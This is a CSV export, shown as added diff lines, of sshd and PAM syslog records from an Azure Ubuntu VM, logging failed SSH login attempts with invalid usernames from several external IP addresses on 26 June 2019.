+13147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:31:11,UbuntuDevEnv,2019-06-26 04:31:10,auth,UbuntuDevEnv,info,Disconnected from invalid user test7 95.216.195.95 port 59586 [preauth],128026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test7,95.216.195.9,59586,,
+13148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:07,UbuntuDevEnv,2019-06-26 04:32:07,auth,UbuntuDevEnv,info,Connection closed by 119.123.240.8 port 44429 [preauth],128209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,44429,,
+13149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:20,UbuntuDevEnv,2019-06-26 04:32:19,auth,UbuntuDevEnv,info,Invalid user ping from 5.135.161.72 port 52178,128281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ping,5.135.161.7,52178,,
+13150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:20,UbuntuDevEnv,2019-06-26 04:32:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:20,UbuntuDevEnv,2019-06-26 04:32:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,128281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:21,UbuntuDevEnv,2019-06-26 04:32:20,auth,UbuntuDevEnv,info,Failed password for invalid user ping from 5.135.161.72 port 52178 ssh2,128281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ping,5.135.161.7,52178,,
+13153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:21,UbuntuDevEnv,2019-06-26 04:32:20,auth,UbuntuDevEnv,info,Disconnected from invalid user ping 5.135.161.72 port 52178 [preauth],128281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ping,5.135.161.7,52178,,
+13154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:21,UbuntuDevEnv,2019-06-26 04:32:20,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 52178:11: Bye Bye [preauth],128281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,52178,,
+13155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:27,UbuntuDevEnv,2019-06-26 04:32:27,auth,UbuntuDevEnv,info,Invalid user oa from 196.41.208.238 port 36038,128301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oa,196.41.208.2,36038,,
+13156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:27,UbuntuDevEnv,2019-06-26 04:32:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:27,UbuntuDevEnv,2019-06-26 04:32:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,128301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+13158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:29,UbuntuDevEnv,2019-06-26 04:32:29,auth,UbuntuDevEnv,info,Failed password for invalid user oa from 196.41.208.238 port 36038 ssh2,128301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oa,196.41.208.2,36038,,
+13159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:29,UbuntuDevEnv,2019-06-26 04:32:29,auth,UbuntuDevEnv,info,Disconnected from invalid user oa 196.41.208.238 port 36038 [preauth],128301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oa,196.41.208.2,36038,,
+13160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:29,UbuntuDevEnv,2019-06-26 04:32:29,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 36038:11: Bye Bye [preauth],128301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,36038,,
+13161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:33,UbuntuDevEnv,2019-06-26 04:32:33,auth,UbuntuDevEnv,info,Invalid user fw from 95.216.195.95 port 48248,128334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fw,95.216.195.9,48248,,
+13162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:33,UbuntuDevEnv,2019-06-26 04:32:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,128334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:33,UbuntuDevEnv,2019-06-26 04:32:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:34,UbuntuDevEnv,2019-06-26 04:32:33,auth,UbuntuDevEnv,info,Invalid user sa from 177.23.90.10 port 41334,128316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,177.23.90.1,41334,,
+13165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:34,UbuntuDevEnv,2019-06-26 04:32:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,128316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+13166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:34,UbuntuDevEnv,2019-06-26 04:32:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:35,UbuntuDevEnv,2019-06-26 04:32:34,auth,UbuntuDevEnv,info,Failed password for invalid user fw from 95.216.195.95 port 48248 ssh2,128334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fw,95.216.195.9,48248,,
+13168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:35,UbuntuDevEnv,2019-06-26 04:32:35,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 48248:11: Bye Bye [preauth],128334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,48248,,
+13169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:35,UbuntuDevEnv,2019-06-26 04:32:35,auth,UbuntuDevEnv,info,Disconnected from invalid user fw 95.216.195.95 port 48248 [preauth],128334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fw,95.216.195.9,48248,,
+13170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:35,UbuntuDevEnv,2019-06-26 04:32:35,auth,UbuntuDevEnv,info,Failed password for invalid user sa from 177.23.90.10 port 41334 ssh2,128316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,177.23.90.1,41334,,
+13171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:35,UbuntuDevEnv,2019-06-26 04:32:35,auth,UbuntuDevEnv,info,Disconnected from invalid user sa 177.23.90.10 port 41334 [preauth],128316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,177.23.90.1,41334,,
+13172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:35,UbuntuDevEnv,2019-06-26 04:32:35,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 41334:11: Bye Bye [preauth],128316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,41334,,
+13173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:38,UbuntuDevEnv,2019-06-26 04:32:38,auth,UbuntuDevEnv,info,Invalid user wf from 200.6.188.38 port 34891,128348,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wf,200.6.188.3,34891,,
+13174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:38,UbuntuDevEnv,2019-06-26 04:32:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128348,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:38,UbuntuDevEnv,2019-06-26 04:32:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,128348,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+13176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:40,UbuntuDevEnv,2019-06-26 04:32:40,auth,UbuntuDevEnv,info,Failed password for invalid user wf from 200.6.188.38 port 34891 ssh2,128348,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wf,200.6.188.3,34891,,
+13177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:40,UbuntuDevEnv,2019-06-26 04:32:40,auth,UbuntuDevEnv,info,Disconnected from invalid user wf 200.6.188.38 port 34891 [preauth],128348,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wf,200.6.188.3,34891,,
+13178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:32:40,UbuntuDevEnv,2019-06-26 04:32:40,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 34891:11: Bye Bye [preauth],128348,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,34891,,
+13179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:33:07,UbuntuDevEnv,2019-06-26 04:33:06,auth,UbuntuDevEnv,info,Did not receive identification string from 209.17.96.2 port 56209,128455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,209.17.96.2,56209,,
+13180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:33:10,UbuntuDevEnv,2019-06-26 04:33:10,auth,UbuntuDevEnv,info,Connection closed by 119.123.240.8 port 47940 [preauth],128443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,47940,,
+13181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:33:44,UbuntuDevEnv,2019-06-26 04:33:43,auth,UbuntuDevEnv,info,Invalid user lachlan from 5.135.161.72 port 41024,128577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lachlan,5.135.161.7,41024,,
+13182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:33:44,UbuntuDevEnv,2019-06-26 04:33:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:33:44,UbuntuDevEnv,2019-06-26 04:33:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,128577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:33:46,UbuntuDevEnv,2019-06-26 04:33:45,auth,UbuntuDevEnv,info,Failed password for invalid user lachlan from 5.135.161.72 port 41024 ssh2,128577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lachlan,5.135.161.7,41024,,
+13185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:33:46,UbuntuDevEnv,2019-06-26 04:33:45,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 41024:11: Bye Bye [preauth],128577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,41024,,
+13186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:33:46,UbuntuDevEnv,2019-06-26 04:33:45,auth,UbuntuDevEnv,info,Disconnected from invalid user lachlan 5.135.161.72 port 41024 [preauth],128577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lachlan,5.135.161.7,41024,,
+13187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:00,UbuntuDevEnv,2019-06-26 04:33:59,auth,UbuntuDevEnv,info,Invalid user kuo123 from 95.216.195.95 port 36626,128635,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kuo123,95.216.195.9,36626,,
+13188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:00,UbuntuDevEnv,2019-06-26 04:33:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128635,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:00,UbuntuDevEnv,2019-06-26 04:33:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,128635,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:01,UbuntuDevEnv,2019-06-26 04:34:00,auth,UbuntuDevEnv,info,Failed password for invalid user kuo123 from 95.216.195.95 port 36626 ssh2,128635,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kuo123,95.216.195.9,36626,,
+13191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:01,UbuntuDevEnv,2019-06-26 04:34:01,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 36626:11: Bye Bye [preauth],128635,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,36626,,
+13192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:01,UbuntuDevEnv,2019-06-26 04:34:01,auth,UbuntuDevEnv,info,Disconnected from invalid user kuo123 95.216.195.95 port 36626 [preauth],128635,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kuo123,95.216.195.9,36626,,
+13193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:14,UbuntuDevEnv,2019-06-26 04:34:14,auth,UbuntuDevEnv,info,Connection closed by 119.123.240.8 port 51457 [preauth],128670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,51457,,
+13194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:17,UbuntuDevEnv,2019-06-26 04:34:16,auth,UbuntuDevEnv,info,Invalid user musikbot from 200.6.188.38 port 12293,128702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,musikbot,200.6.188.3,12293,,
+13195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:17,UbuntuDevEnv,2019-06-26 04:34:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:17,UbuntuDevEnv,2019-06-26 04:34:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,128702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+13197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:19,UbuntuDevEnv,2019-06-26 04:34:19,auth,UbuntuDevEnv,info,Failed password for invalid user musikbot from 200.6.188.38 port 12293 ssh2,128702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,musikbot,200.6.188.3,12293,,
+13198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:20,UbuntuDevEnv,2019-06-26 04:34:19,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 12293:11: Bye Bye [preauth],128702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,12293,,
+13199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:20,UbuntuDevEnv,2019-06-26 04:34:19,auth,UbuntuDevEnv,info,Disconnected from invalid user musikbot 200.6.188.38 port 12293 [preauth],128702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,musikbot,200.6.188.3,12293,,
+13200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:35,UbuntuDevEnv,2019-06-26 04:34:35,auth,UbuntuDevEnv,info,Invalid user dan from 196.41.208.238 port 33932,128768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dan,196.41.208.2,33932,,
+13201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:35,UbuntuDevEnv,2019-06-26 04:34:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,128768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+13202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:35,UbuntuDevEnv,2019-06-26 04:34:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:37,UbuntuDevEnv,2019-06-26 04:34:36,auth,UbuntuDevEnv,info,Failed password for invalid user dan from 196.41.208.238 port 33932 ssh2,128768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dan,196.41.208.2,33932,,
+13204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:37,UbuntuDevEnv,2019-06-26 04:34:37,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 33932:11: Bye Bye [preauth],128768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,33932,,
+13205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:37,UbuntuDevEnv,2019-06-26 04:34:37,auth,UbuntuDevEnv,info,Disconnected from invalid user dan 196.41.208.238 port 33932 [preauth],128768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dan,196.41.208.2,33932,,
+13206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:34:51,UbuntuDevEnv,2019-06-26 04:34:50,auth,UbuntuDevEnv,info,Invalid user nathan from 177.23.90.10 port 46986,128821,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathan,177.23.90.1,46986,,
